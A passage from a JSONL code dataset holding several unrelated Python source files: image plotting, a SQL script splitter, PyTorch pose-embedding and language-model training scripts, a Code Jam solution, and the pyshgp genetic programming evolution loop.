plt.figure(3)\n plt.subplot(1, 2, 1)\n plt.title('image:%d, slice:%d, original image' % (n, k))\n plt.imshow(image_32[k], cmap='gray')\n plt.subplot(1, 2, 2)\n plt.title('image:%d, slice:%d, original target' % (n, k))\n plt.imshow(target_32[k], cmap='gray')\n plt.show()\n\n\n","sub_path":"plot_image.py","file_name":"plot_image.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"598699625","text":"# Fraser Isbester 2019\r\n\r\ndef parse_sql(filename) -> list:\r\n data = open(filename, 'r').readlines()\r\n stmts = []\r\n DELIMITER = ';'\r\n stmt = ''\r\n\r\n comment_flag = 0\r\n inquote_flag = 0\r\n\r\n for lineno, line in enumerate(data):\r\n\r\n quote_count = 
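# Editor's sketch (aside, not part of the original record): plot_image.py above
# downscales a stack of image/label slices with bilinear interpolation on a
# (N, C, H, W) tensor; the same F.interpolate call in isolation:
import torch
import torch.nn.functional as F

x = torch.randn(8, 2, 512, 512)        # N slices, image + label channels
x_small = F.interpolate(x, scale_factor=1 / 16, mode='bilinear', align_corners=False)
print(x_small.shape)                   # torch.Size([8, 2, 32, 32])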
line.count(\"'\")\r\n del_count = line.count(DELIMITER)\r\n\r\n # Handle Comment Blocks\r\n if('/*' in line and '*/' not in line and comment_flag != 1):\r\n # print(\"Found Comment start:\", line)\r\n # input(\"\")\r\n comment_flag = 1\r\n continue\r\n if('*/' in line and '/*' not in line and comment_flag != 0):\r\n # print(\"Found Comment end\")\r\n # input(\"\")\r\n comment_flag = 0\r\n continue\r\n if(comment_flag == 1 or line.startswith('--')):\r\n # print(\"Skipping:\", line)\r\n # input(\"\")\r\n continue\r\n # Handle Delimer-in-quote problems\r\n if(quote_count > 0 and del_count > 0):\r\n stmt_buffer = ''\r\n for char in line:\r\n if(char == \"\\\\'\"):\r\n stmt_buffer += char\r\n elif(char == \"'\"):\r\n inquote_flag += 1\r\n if(char == DELIMITER):\r\n if(inquote_flag % 2 == 0):\r\n stmt_buffer += char\r\n stmt += stmt_buffer\r\n stmts.append(stmt.strip())\r\n stmt = ''\r\n continue\r\n elif(inquote_flag % 2 != 0):\r\n stmt_buffer += char\r\n else:\r\n print(\"Big error in del-in-quote proccessing\")\r\n quit()\r\n else:\r\n stmt_buffer += char\r\n stmt += stmt_buffer\r\n continue\r\n\r\n if not line.strip():\r\n continue\r\n\r\n if 'DELIMITER' in line:\r\n print('DELIMITER In line?')\r\n input(\"\")\r\n DELIMITER = line.split()[1]\r\n continue\r\n\r\n if (DELIMITER not in line):\r\n stmt += line.replace(DELIMITER, ';')\r\n continue\r\n\r\n if stmt:\r\n stmt += line\r\n stmts.append(stmt.strip())\r\n stmt = ''\r\n else:\r\n stmts.append(line.strip())\r\n\r\n return stmts\r\n","sub_path":"SQL Script Automation Code.py","file_name":"SQL Script Automation Code.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"335128119","text":"import torch\nimport torch.optim as optim\nimport torch.utils.data.dataset\nfrom torch.autograd import Variable\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom PIL import Image\nimport scipy.misc\nfrom glob import glob\nfrom other.spatial_transforms import (Compose, Normalize, Scale, CenterCrop, ToTensor)\nfrom other.mean_vggs import get_mean\nfrom path_manager import PathManager\nfrom nets.net_poseemb import Net\n\n\n# set the distance files\ndistances_train_file = PathManager.path_distance_frame0_path_3d_train\ndistances_valtest_file = PathManager.path_distance_frame0_path_3d_valtest\n\n# set the train and val dataset files\ndataset_train_txt = PathManager.path_dataset_train_txt\ndataset_valtest_txt = PathManager.path_dataset_valtest_txt\n\n\nclass ThinSlicingTrainset(torch.utils.data.dataset.Dataset):\n def __init__(self, far_max=None):\n super(ThinSlicingTrainset, self).__init__()\n\n self.far_min = 31\n self.far_max = far_max\n\n self.image_root = PathManager.path_image_root\n\n print('- loading distances')\n distances_filename = distances_train_file\n distances = np.load(distances_filename)\n self.nearest_indices = np.argsort(distances, axis=1)\n self.nearest_indices[:, 0] = np.array(range(self.nearest_indices.shape[0]))\n\n with open(dataset_train_txt) as infile:\n image_list = [x.strip() for x in infile.readlines()]\n self.dataset = [[' '.join(x.strip().split(' ')[:-16]) + '/'] + x.strip().split(' ')[-16:] for x in image_list]\n\n def __getitem__(self, index):\n return self.load_batch(index)\n\n def __len__(self):\n return len(self.dataset)\n\n def load_batch(self, index):\n # print index\n\n shuffled = lambda seq, rnd=random.random: sorted(seq, key=lambda _: rnd())\n should_horizontally_flip = 
random.getrandbits(1)\n\n selection = [0] + shuffled(range(1, 31))[0:5] + shuffled(range(31, self.far_max))[0:105]\n\n spatial_transform = Compose([Scale(112),\n CenterCrop(112),\n ToTensor(),\n Normalize(get_mean(), [1, 1, 1])])\n\n near_indices = self.nearest_indices[index]\n\n image_crops_list = []\n prepped_tensors = []\n for idx, near_idx in enumerate(near_indices[selection]):\n image_name = self.image_root + self.dataset[near_idx][0] + self.dataset[near_idx][1].split('_')[1] + '.png'\n raw_imgs = scipy.misc.imread(image_name)[np.newaxis,:]\n\n r1, g1, b1 = [115, 108, 99]\n r2, g2, b2, = get_mean()\n red, green, blue = raw_imgs[:, :, :, 0], raw_imgs[:, :, :, 1], raw_imgs[:, :, :, 2]\n mask = (red == r1) & (green == g1) & (blue == b1)\n raw_imgs[:, :, :, :3][mask] = [r2, g2, b2]\n\n image_crops = self.augment(raw_imgs, do_flip=should_horizontally_flip)\n image_crops_list += [image_crops]\n\n prepped_images = [spatial_transform(Image.fromarray(image_crop)) for image_crop in image_crops][0]\n prepped_tensor = prepped_images\n\n prepped_tensors += [prepped_tensor]\n\n # labels = ['anchor', 'similar', 'similar', 'similar', 'similar', 'similar', 'different', 'different', 'different']\n # image_crops_list = image_crops_list[0:9]\n # for frame in [0]:\n # fig = plt.figure()\n # for axes_idx in range(1,10):\n # fig.add_subplot(3, 3, axes_idx)\n # plt.imshow(image_crops_list[axes_idx-1][frame])\n # plt.title(labels[axes_idx-1])\n # plt.axis('off')\n # plt.show()\n\n batch = torch.stack(prepped_tensors, 0)\n\n batch2 = torch.zeros(batch.size())\n batch2[:, 0] = batch[:, 2]\n batch2[:, 1] = batch[:, 1]\n batch2[:, 2] = batch[:, 0]\n\n return batch2\n\n def augment(self, raw_imgs, do_flip):\n image0 = raw_imgs[0]\n\n if do_flip:\n for raw_img_idx, raw_img in enumerate(raw_imgs):\n raw_imgs[raw_img_idx] = np.fliplr(raw_img)\n\n stacked_images = raw_imgs\n\n shuffled = lambda seq, rnd=random.random: sorted(seq, key=lambda _: rnd())\n\n image_crops = []\n\n xmin = 16\n ymin = 16\n xmax = xmin + 112\n ymax = ymin + 112\n\n size_img = image0.shape[0]\n\n s_ratio = 0.050\n t_ratio = 0.050\n\n smag_max = int(np.ceil(s_ratio * 112))\n tmag_max = int(np.ceil(t_ratio * 112))\n\n scale = shuffled(range(smag_max * 2))[0]\n\n smag_rand = scale - smag_max\n xmin = xmin - smag_rand\n xmax = xmax + smag_rand\n ymin = ymin - smag_rand\n ymax = ymax + smag_rand\n\n tmag_xmin = np.max([1 - xmin, -tmag_max])\n tmag_ymin = np.max([1 - ymin, -tmag_max])\n tmag_xmax = np.min([size_img - xmax, tmag_max])\n tmag_ymax = np.min([size_img - ymax, tmag_max])\n\n translate_x = shuffled(range(tmag_xmax - tmag_xmin))[0]\n translate_y = shuffled(range(tmag_ymax - tmag_ymin))[0]\n\n tmag_rand_x = range(tmag_xmin, tmag_xmax)[translate_x]\n tmag_rand_y = range(tmag_ymin, tmag_ymax)[translate_y]\n xmin = xmin + tmag_rand_x\n xmax = xmax + tmag_rand_x\n ymin = ymin + tmag_rand_y\n ymax = ymax + tmag_rand_y\n\n image_sliced = stacked_images[:, ymin:ymax, xmin:xmax, :]\n\n for image_slice in image_sliced:\n img_crop = cv2.resize(image_slice, (112, 112))\n image_crops += [img_crop]\n\n return image_crops\n\n\nclass ThinSlicingValset(torch.utils.data.dataset.Dataset):\n def __init__(self):\n print('Loading Thin-Motion Valset')\n super(ThinSlicingValset, self).__init__()\n\n self.image_root = PathManager.path_image_root\n\n print('- loading distances')\n distances_filename = distances_valtest_file\n distances = np.load(distances_filename)\n distances = distances[:1919, :1919]\n\n self.nearest_indices = np.argsort(distances, axis=1)\n 
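# Editor's sketch (aside, not part of the original record): the two lines around
# this point rank every clip by distance and then pin each row's first entry to
# the row's own index, so position 0 is always the anchor itself:
import numpy as np

D = np.random.rand(5, 5)                 # hypothetical pairwise distance matrix
order = np.argsort(D, axis=1)            # row i: indices sorted by distance to i
order[:, 0] = np.arange(D.shape[0])      # force each row to start with itself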
self.nearest_indices[:, 0] = np.array(range(self.nearest_indices.shape[0]))\n\n with open(dataset_valtest_txt) as infile:\n image_list = [x.strip() for x in infile.readlines()]\n self.dataset = [[' '.join(x.strip().split(' ')[:-16]) + '/'] + x.strip().split(' ')[-16:] for x in image_list]\n self.dataset = self.dataset[:1919]\n\n def __getitem__(self, index):\n return self.load_batch(index)\n\n def __len__(self):\n return self.nearest_indices.shape[0]\n\n def load_batch(self, index):\n # print index\n\n shuffled = lambda seq, rnd=random.random: sorted(seq, key=lambda _: rnd())\n\n selection = [0] + shuffled(range(1, 31))[0:5] + shuffled(range(31, self.nearest_indices.shape[1]))[0:105]\n\n spatial_transform = Compose([Scale(112),\n CenterCrop(112),\n ToTensor(),\n Normalize(get_mean(), [1, 1, 1])])\n\n near_indices = self.nearest_indices[index]\n\n image_crops_list = []\n prepped_tensors = []\n for idx, near_idx in enumerate(near_indices[selection]):\n image_name = self.image_root + self.dataset[near_idx][0] + self.dataset[near_idx][1].split('_')[1] + '.png'\n raw_imgs = scipy.misc.imread(image_name)[np.newaxis,:]\n\n r1, g1, b1 = [115, 108, 99]\n r2, g2, b2, = get_mean()\n red, green, blue = raw_imgs[:, :, :, 0], raw_imgs[:, :, :, 1], raw_imgs[:, :, :, 2]\n mask = (red == r1) & (green == g1) & (blue == b1)\n raw_imgs[:, :, :, :3][mask] = [r2, g2, b2]\n\n image_crops = self.augment(raw_imgs)\n image_crops_list += [image_crops]\n\n prepped_images = [spatial_transform(Image.fromarray(image_crop)) for image_crop in image_crops][0]\n prepped_tensor = prepped_images\n\n prepped_tensors += [prepped_tensor]\n\n # labels = ['anchor', 'similar', 'similar', 'similar', 'similar', 'similar', 'different', 'different', 'different']\n # image_crops_list = image_crops_list[0:9]\n # for frame in [0]:\n # fig = plt.figure()\n # for axes_idx in range(1,10):\n # fig.add_subplot(3, 3, axes_idx)\n # plt.imshow(image_crops_list[axes_idx-1][frame])\n # plt.title(labels[axes_idx-1])\n # plt.axis('off')\n # plt.show()\n\n batch = torch.stack(prepped_tensors, 0)\n\n batch2 = torch.zeros(batch.size())\n batch2[:, 0] = batch[:, 2]\n batch2[:, 1] = batch[:, 1]\n batch2[:, 2] = batch[:, 0]\n\n return batch2\n\n def augment(self, raw_imgs):\n image0 = raw_imgs[0]\n\n stacked_images = raw_imgs\n\n image_crops = []\n\n xmin = 16\n ymin = 16\n xmax = xmin + 112\n ymax = ymin + 112\n\n size_img = image0.shape[0]\n\n s_ratio = 0.050\n t_ratio = 0.050\n\n smag_max = int(np.ceil(s_ratio * 112))\n tmag_max = int(np.ceil(t_ratio * 112))\n\n smag_rand = range(smag_max * 2)[6] - smag_max\n xmin = xmin - smag_rand\n xmax = xmax + smag_rand\n ymin = ymin - smag_rand\n ymax = ymax + smag_rand\n\n tmag_xmin = np.max([1 - xmin, -tmag_max])\n tmag_ymin = np.max([1 - ymin, -tmag_max])\n tmag_xmax = np.min([size_img - xmax, tmag_max])\n tmag_ymax = np.min([size_img - ymax, tmag_max])\n tmag_rand_x = range(tmag_xmin, tmag_xmax)[range(tmag_xmax - tmag_xmin)[6]]\n tmag_rand_y = range(tmag_ymin, tmag_ymax)[range(tmag_ymax - tmag_ymin)[6]]\n xmin = xmin + tmag_rand_x\n xmax = xmax + tmag_rand_x\n ymin = ymin + tmag_rand_y\n ymax = ymax + tmag_rand_y\n\n image_sliced = stacked_images[:, ymin:ymax, xmin:xmax, :]\n\n for image_slice in image_sliced:\n img_crop = cv2.resize(image_slice, (112, 112))\n image_crops += [img_crop]\n\n return image_crops\n\n\ndef draw_plot(train_losses, val_losses, iter_display):\n x = np.array(range(0, len(train_losses))) * iter_display\n\n plt.ylim([0, 0.25])\n\n plt.plot(x, train_losses, label=\"trn\")\n plt.plot(x, 
val_losses, label=\"val\")\n plt.legend()\n global base_lr\n plt.savefig(results_path + 'loss.png')\n plt.close()\n\n\ndef train(epoch):\n global train_losses\n global val_losses\n\n val_iters = 500\n\n train_loss_mean = []\n for batch_idx, data in enumerate(train_loader):\n model.train()\n\n data = data[0].cuda()\n\n optimizer.zero_grad()\n (loss, l2_norm) = model(Variable(data))\n loss.backward()\n optimizer.step()\n\n train_loss_mean += [float(loss.data)]\n\n if batch_idx % val_iters == 0:\n print('epoch ' + str(epoch) + ', batch ' + str(batch_idx) + ': ' + str(float(loss.data)))\n train_losses += [np.mean(train_loss_mean)]\n val_losses += [val(5)]\n draw_plot(train_losses, val_losses, iter_display=val_iters)\n train_loss_mean = []\n\n torch.save(model.state_dict(), results_path + 'model_' + str(epoch) + '.pth')\n\n\ndef val(val_iterations=1):\n model.eval()\n\n loss_mean = 0\n\n for batch_idx, data in enumerate(val_loader):\n if batch_idx == val_iterations:\n break\n\n data = data[0].cuda()\n (loss, l2_norm) = model(Variable(data))\n loss_mean += float(loss.data) / float(val_iterations)\n\n return loss_mean\n\n\nif __name__ == '__main__':\n base_lr = 0.01\n\n train_losses = []\n val_losses = []\n results_path = 'results/'\n\n start_epoch = np.max([int(weights.split('_')[-1].split('.pth')[0])+1 for weights in glob(results_path+'model_*.pth')] + [0])\n\n model = Net()\n if start_epoch > 0:\n print('Resuming from model_'+str(start_epoch-1)+'.pth')\n model.load_state_dict(torch.load(results_path+'model_'+str(start_epoch-1)+'.pth'))\n else:\n raw_state_dict = model.state_dict()\n state_dict = torch.load(PathManager.path_vggs_conv_weights) # vgg convs, random fcs\n state_dict['conv1.weight'] = state_dict.pop('0.weight')\n state_dict['conv1.bias'] = state_dict.pop('0.bias')\n state_dict['conv2.weight'] = state_dict.pop('4.weight')\n state_dict['conv2.bias'] = state_dict.pop('4.bias')\n state_dict['conv3.weight'] = state_dict.pop('7.weight')\n state_dict['conv3.bias'] = state_dict.pop('7.bias')\n state_dict['conv4.weight'] = state_dict.pop('9.weight')\n state_dict['conv4.bias'] = state_dict.pop('9.bias')\n state_dict['conv5.weight'] = state_dict.pop('11.weight')\n state_dict['conv5.bias'] = state_dict.pop('11.bias')\n state_dict.pop('15.1.weight')\n state_dict.pop('15.1.bias')\n state_dict.pop('18.1.weight')\n state_dict.pop('18.1.bias')\n raw_state_dict.update(state_dict)\n model.load_state_dict(raw_state_dict)\n model = model.cuda()\n\n # val_dataset = ThinSlicingValset()\n # val_loader = torch.utils.data.DataLoader(val_dataset, num_workers=0, shuffle=True, batch_size=1)\n # for batch_idx, data in enumerate(val_loader):\n # x = 5\n # dataset_trn = ThinSlicingTrainset(far_max=len(ThinSlicingTrainset()))\n # train_loader = torch.utils.data.DataLoader(dataset_trn, num_workers=0, shuffle=True, batch_size=1)\n # for batch_idx, data in enumerate(train_loader):\n # x = 5\n\n for epoch in range(start_epoch, 7):\n anneal_factor = 0.2**epoch\n\n optimizer = optim.SGD([\n {'params': model.conv1.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv2.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv3.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.conv4.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': 
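# Editor's sketch (aside, not part of the original record): the SGD construction
# around this point uses per-parameter-group options -- a 10x smaller learning
# rate for the pretrained conv layers than for the fresh fc layers. Minimal form:
import torch
import torch.optim as optim

net = torch.nn.Sequential(torch.nn.Linear(4, 8), torch.nn.Linear(8, 2))
opt = optim.SGD(
    [{'params': net[0].parameters(), 'lr': 1e-3},    # pretrained layer: lower LR
     {'params': net[1].parameters(), 'lr': 1e-2}],   # new head: higher LR
    momentum=0.9, weight_decay=5e-4, nesterov=True)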
model.conv5.parameters(), 'lr': 0.1*base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.fc6.parameters(), 'lr': base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n {'params': model.fc7.parameters(), 'lr': base_lr*anneal_factor, 'momentum': 0.9, 'weight_decay': 0.0005, 'nesterov': True},\n ])\n\n far_min = 31\n far_max = len(ThinSlicingTrainset()) - epoch * 3000\n if far_max < far_min + 1000:\n far_max = far_min + 1000\n\n dataset_trn = ThinSlicingTrainset(far_max=far_max)\n train_loader = torch.utils.data.DataLoader(dataset_trn, num_workers=1, shuffle=True, batch_size=1)\n dataset_val = ThinSlicingValset()\n val_loader = torch.utils.data.DataLoader(dataset_val, num_workers=0, shuffle=True, batch_size=1)\n\n train(epoch)\n\n print('Training complete')","sub_path":"experiments/image/3d/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"274010768","text":"#!/usr/bin/env python\nfrom __future__ import division\nimport sys\n\ndef lastWord(S):\n\tif len(S)==1:\n\t\treturn S\n\telse:\n\t\toptimal = lastWord(S[:-1])\n\t\tif S[-1]>=optimal[0]:\n\t\t\treturn S[-1]+optimal\n\t\telse:\n\t\t\treturn optimal+S[-1]\n\n#####################\n#########Main########\n#####################\n\nline = lambda : sys.stdin.readline().strip(\"\\n\")\n\ndef main():\n\n\t#Number of test cases\n\tntest = int(line())\n\n\t#Cycle over test cases\n\tfor t in range(ntest):\n\t\t\n\t\t#Read S\n\t\tS = line()\n\n\t\t#Calculate answer and output\n\t\tsys.stdout.write(\"Case #{0}: {1}\\n\".format(t+1,lastWord(S)))\n\nif __name__==\"__main__\":\n\tmain()","sub_path":"solutions_5631989306621952_0/Python/apetri/code-A.py","file_name":"code-A.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"318300977","text":"# _*_ coding: utf_8 _*_\r\n\r\n\"\"\"\r\nThe :mod:`gp` module defines the genetic programming capabilities of pyshgp.\r\nThe functions in this module are responsible for creating populations,\r\nevaluating individuals, and defining the core evolutionary loop that will be \r\nused to drive evolution.\r\n\r\n.. todo::\r\n Create more general abstraction of evolution, probably in the form of a \r\n class. Include extentions for scikit-learn.\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function, unicode_literals\r\n\r\nimport sys\r\nimport datetime\r\n\r\nfrom .. import utils as u\r\nfrom .. import exceptions as e\r\nfrom .. import constants as c\r\nfrom ..push import random as r\r\nfrom ..push import simplification as simp\r\nfrom ..push import instruction as instr\r\n\r\nfrom ..push.instructions import registered_instructions as ri\r\nfrom ..push.instructions import *\r\n\r\nfrom . import individual\r\nfrom . import operators as go\r\nfrom . import monitors as monitor\r\nfrom . import reporting\r\nfrom . import params\r\n\r\ndef normalize_genetic_operator_probabilities(gen_op_dict):\r\n \"\"\"Normalizes dict of operator probabilities so that values sum to 1.\r\n\r\n :param dict gen_op_dict: Dict where keys are operator names and values are probabilities. 
\r\n :returns: ``gen_op_dict`` where values sum to 1 and relative magnitude preserved.\r\n \"\"\"\r\n tot = sum(gen_op_dict.values())\r\n new_probs = [round(x / tot, 4) for x in gen_op_dict.values()]\r\n return dict(zip(gen_op_dict.keys(), new_probs))\r\n\r\n\r\ndef load_program_from_list(lst):\r\n \"\"\"Loads a program from a list, and checks each string in list for an instruction with the same name.\r\n\r\n .. warning::\r\n This function will attempt to look up all strings in the registered\r\n instructions to see if an instruction with a matching name exists. \r\n This limits you to only using strings that are not exact matches of\r\n instruction names. This is mitigated by the fact that all instruction\r\n names begin with a ``'_'``.\r\n\r\n :param list lst: List that should be translated into a Push program.\r\n :returns: List that can be executed as a Push program.\r\n \"\"\"\r\n program = []\r\n for el in lst:\r\n # For each element in the list\r\n if type(el) == int or type(el) == float or type(el) == bool or type(el) == u.Character or type(el) == u.PushVector:\r\n # If ``el`` is an int, float, bool, Character object or PushVector object simply \r\n # append to the program because these are push literals.\r\n program.append(el)\r\n elif type(el) == instr.PyshInstruction or type(el) == instr.PyshInputInstruction or type(el) == instr.PyshClassVoteInstruction:\r\n # If ``el`` an instance of any of the instruction types, append to the program.\r\n program.append(el)\r\n elif u.is_str_type(el):\r\n # If ``el`` is a string:\r\n el = str(el)\r\n # Attempt to find an instruction with ``el`` as its name.\r\n matching_instruction = None\r\n try:\r\n matching_instruction = ri.get_instruction(el)\r\n except e.UnknownInstructionName():\r\n pass\r\n # If matching_instruction is None, it must be a ssring literal.\r\n if matching_instruction == None:\r\n program.append(el)\r\n else:\r\n program.append(matching_instruction)\r\n elif type(el) == list:\r\n # If ``el`` is a list (but not PushVector) turn it into a program\r\n # and append it to (aka. 
nest it in) the program.\r\n program.append(load_program_from_list(el))\r\n return program\r\n\r\ndef generate_random_population(evolutionary_params):\r\n \"\"\"Generate random population based on given evolutionary_params.\r\n\r\n :param dict evolutionary_params: Dict of evolutionary hyper-parameters.\r\n :returns: A list of Individual objects with randomly generated genomes and translated programs.\r\n \"\"\"\r\n population = []\r\n for i in range(evolutionary_params[\"population_size\"]):\r\n rand_genome = r.random_plush_genome(evolutionary_params['max_genome_initial_size'], evolutionary_params)\r\n new_ind = individual.Individual(rand_genome, evolutionary_params)\r\n population.append(new_ind)\r\n return population\r\n\r\ndef evaluate_individual(ind, error_function):\r\n \"\"\"Adds an error vector to an individual evaluated on the given error_function.\r\n\r\n :param Individual ind: An instance of the Individual class.\r\n :param function error_function: Python function that evaluates an individual based on its program.\r\n :return: Individual with error values assigned.\r\n \"\"\"\r\n if ind.get_errors() == []: # Only evaluate the individual if it hasn't been already.\r\n errors = error_function(ind.get_program())\r\n reporting.total_errors_in_evalutaion_order.append(sum(errors))\r\n ind.set_errors(errors)\r\n return ind\r\n\r\n\r\ndef evaluate_population(population, error_function, evolutionary_params):\r\n \"\"\"Updates the errors of the population.\r\n\r\n :param list population: List of Individual objects\r\n :param function error_function: Python function that evaluates an individual based on its program.\r\n :param dict evolutionary_params: Other parameters (see params.py)\r\n :returns: New population (list of Individuals) with error values assigned.\r\n \"\"\"\r\n if evolutionary_params['parallel_evaluation'] and (evolutionary_params[\"max_workers\"] == None or evolutionary_params[\"max_workers\"] > 1):\r\n # If parallel evalutation, map over the pool.\r\n pool = evolutionary_params['pool']\r\n return pool.map(evaluate_individual, population, [error_function]*len(population))\r\n else:\r\n # If serial evaluation\r\n return [evaluate_individual(ind, error_function) for ind in population]\r\n\r\ndef evolution(error_function, problem_params):\r\n \"\"\"Basic evolutionary loop. Currently the main GP function in ``pyshgp``.\r\n\r\n .. todo::\r\n This should soon be replaced by various base classes. 
These classes will\r\n include: 1) Evolver - A general evolution class with same functionality \r\n as this function 2) SymbolicRegressor - A class that extends \r\n scikit-learn for regression problems and 3) SymbolicClassifier - A class\r\n that extends scikit-learn for classification problems.\r\n\r\n :param function error_function: Python function that evaluates an individual based on its program.\r\n :param dict problem_params: Evolutionary params that should overide the pyshgp defaults for this run.\r\n \"\"\" \r\n\r\n # Get the params for the run\r\n evolutionary_params = u.merge_dicts(params.default_evolutionary_params, problem_params)\r\n params.grab_command_line_params(evolutionary_params)\r\n evolutionary_params['genetic_operator_probabilities'] = normalize_genetic_operator_probabilities(evolutionary_params['genetic_operator_probabilities'])\r\n\r\n # Make certain params globally accesable\r\n c.global_max_points = evolutionary_params['max_points']\r\n\r\n # Prepare for multi-threading if specified by user\r\n if evolutionary_params[\"max_workers\"] == None or evolutionary_params[\"max_workers\"] > 1:\r\n params.init_executor(evolutionary_params)\r\n\r\n # Print the params for the run\r\n print()\r\n print(\"=== Starting GP Run With Following Parameters ===\")\r\n params.params_pretty_print(evolutionary_params)\r\n print()\r\n\r\n # Create Initial Population\r\n print(\"Creating Initial Population\")\r\n population = generate_random_population(evolutionary_params)\r\n \r\n # Evaluate initial population to get their error vectors\r\n print(\"Evaluating Initial Population\")\r\n start_time = datetime.datetime.now()\r\n population = evaluate_population(population, error_function, evolutionary_params)\r\n end_time = datetime.datetime.now()\r\n reporting.log_timings(\"evaluation\", start_time, end_time)\r\n\r\n stop_reason = None\r\n for g in range(evolutionary_params[\"max_generations\"]):\r\n print()\r\n print(\"Starting Generation:\", g)\r\n\r\n start_time = datetime.datetime.now()\r\n # Select parents and mate them to create offspring\r\n print(\"Performing selection and variation.\")\r\n offspring = go.genetics(population, evolutionary_params, )\r\n end_time = datetime.datetime.now()\r\n reporting.log_timings(\"genetics\", start_time, end_time)\r\n\r\n print(\"Evaluating new individuals in population.\")\r\n start_time = datetime.datetime.now()\r\n offspring = evaluate_population(offspring, error_function, evolutionary_params)\r\n end_time = datetime.datetime.now()\r\n reporting.log_timings(\"evaluation\", start_time, end_time)\r\n \r\n print(\"Installing next generation.\")\r\n population = offspring\r\n #population = sorted(population, key=lambda ind: ind.get_total_error())\r\n \r\n # Print things user wants to monitor\r\n monitor.print_monitors(population, evolutionary_params[\"things_to_monitor\"])\r\n\r\n # Check for any solutions\r\n solutions = [ind for ind in population if ind.get_total_error() <= evolutionary_params[\"error_threshold\"]]\r\n if len(solutions) > 0:\r\n print()\r\n print(\"Solution Found On Generation \" + str(g) + \":\")\r\n print(\"Program:\")\r\n print(solutions[0].get_program())\r\n print(\"Genome:\")\r\n print(solutions[0].get_genome())\r\n print()\r\n simp.auto_simplify(solutions[0], error_function, evolutionary_params[\"final_simplification_steps\"])\r\n stop_reason = 'Solution Found'\r\n break # Finish evolutionary run\r\n\r\n if g == evolutionary_params['max_generations'] - 1:\r\n print()\r\n print('Failure')\r\n print('Best program in final 
generation:')\r\n print(population[0].get_program())\r\n print('Errors:', population[0].get_errors())\r\n stop_reason = 'Max Generation'\r\n\r\n print()\r\n print(\"Generating End of Run Reports\")\r\n if evolutionary_params[\"reports\"][\"timings\"]:\r\n reporting.print_timings()\r\n print()\r\n\r\n\r\n\r\n","sub_path":"pyshgp/gp/gp.py","file_name":"gp.py","file_ext":"py","file_size_in_byte":10139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"86344870","text":"import torch\nimport torch.nn as nn\nimport os, argparse, time, math, pdb\n#import model_Baseline as model\nimport model_langtest as model\nimport numpy as np\nfrom data_loader_lang_test import NFOV\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\n\ndef train(encoder, decoder, optimizer, criterion, MAX_LENGTH):\n\n loss_epoch = []\n for batch_idx, ( _, lang, lang_length, index) in enumerate(train_loader):\n if use_cuda:\n lang, lang_length = lang.cuda(), lang_length.cuda()\n lang, lang_length = Variable(lang), Variable(lang_length)\n lang_max_length = lang.size()[2]\n loss_frame = 0\n for vi in range(3):\n loss = 0\n encoder_hidden, encoder_memory = encoder.initHidden(use_cuda)\n encoder_output_list = encoder(lang[:,vi,:], encoder_hidden, encoder_memory)\n encoder_output = Variable(torch.FloatTensor(encoder_output_list[-1].size()).zero_()).cuda()\n for bi in range(batch_size):\n encoder_output[bi, :] = encoder_output_list[lang_length[bi,vi].data.cpu().numpy()[0]-1][bi,:]\n #NFOV_output, NFOV_memory, NFOV_att= my_model(img_variable, encoder_output, NFOV_output_last, NFOV_memory) # add previous att\n #NFOV_output, NFOV_att = my_model(img_variable, encoder_output)\n #NFOV_output_last = NFOV_output\n #decoder_input = NFOV_output\n decoder_input = encoder_output\n #decoder_input = Variable(torch.FloatTensor(4, 256).zero_()).cuda()\n decoder_hidden, decoder_memory = decoder.initHidden(use_cuda)\n\n decoder_output_list, decoder_prob_list = decoder(lang[:,vi,:], decoder_input, decoder_hidden, decoder_memory)\n pdb.set_trace()\n\n for di in range(1, MAX_LENGTH):\n loss += criterion(decoder_prob_list[di-1], lang[:,vi,di])\n loss = loss / MAX_LENGTH\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n loss_frame += loss.data[0]\n loss_epoch.append(loss_frame / img_length)\n if batch_idx % 5 == 0:\n tt = time.time()\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * train_loader.batch_size, len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n print('time cost:'+str(tt-ts))\n if batch_idx == len(train_loader) - 2:\n break\n return sum(loss_epoch) / len(train_loader)\n\n\ndef trainEpoches(encoder, decoder, n_epoches, MAX_LENGTH, print_every=1, plot_every=100, learning_rate=0.01):\n start = time.time()\n\n all_parameters = list(encoder.parameters()) + list(decoder.parameters())\n optimizer = optim.Adam(all_parameters, lr=learning_rate)\n criterion = nn.NLLLoss()\n\n for Epoches in range(1, n_epoches + 1):\n if int(Epoches)%25 == 0:\n learning_rate = learning_rate/10\n print('Learning rate = ' , learning_rate)\n optimizer = optim.SGD(all_parameters, lr=learning_rate)\n\n loss_epoch = train(encoder, decoder, optimizer, criterion, MAX_LENGTH)\n\n if Epoches % print_every == 0:\n print('Epoch %d is done.' % (Epoches))\n print('Overall time cose: %s (%d %d%%) Avg. 
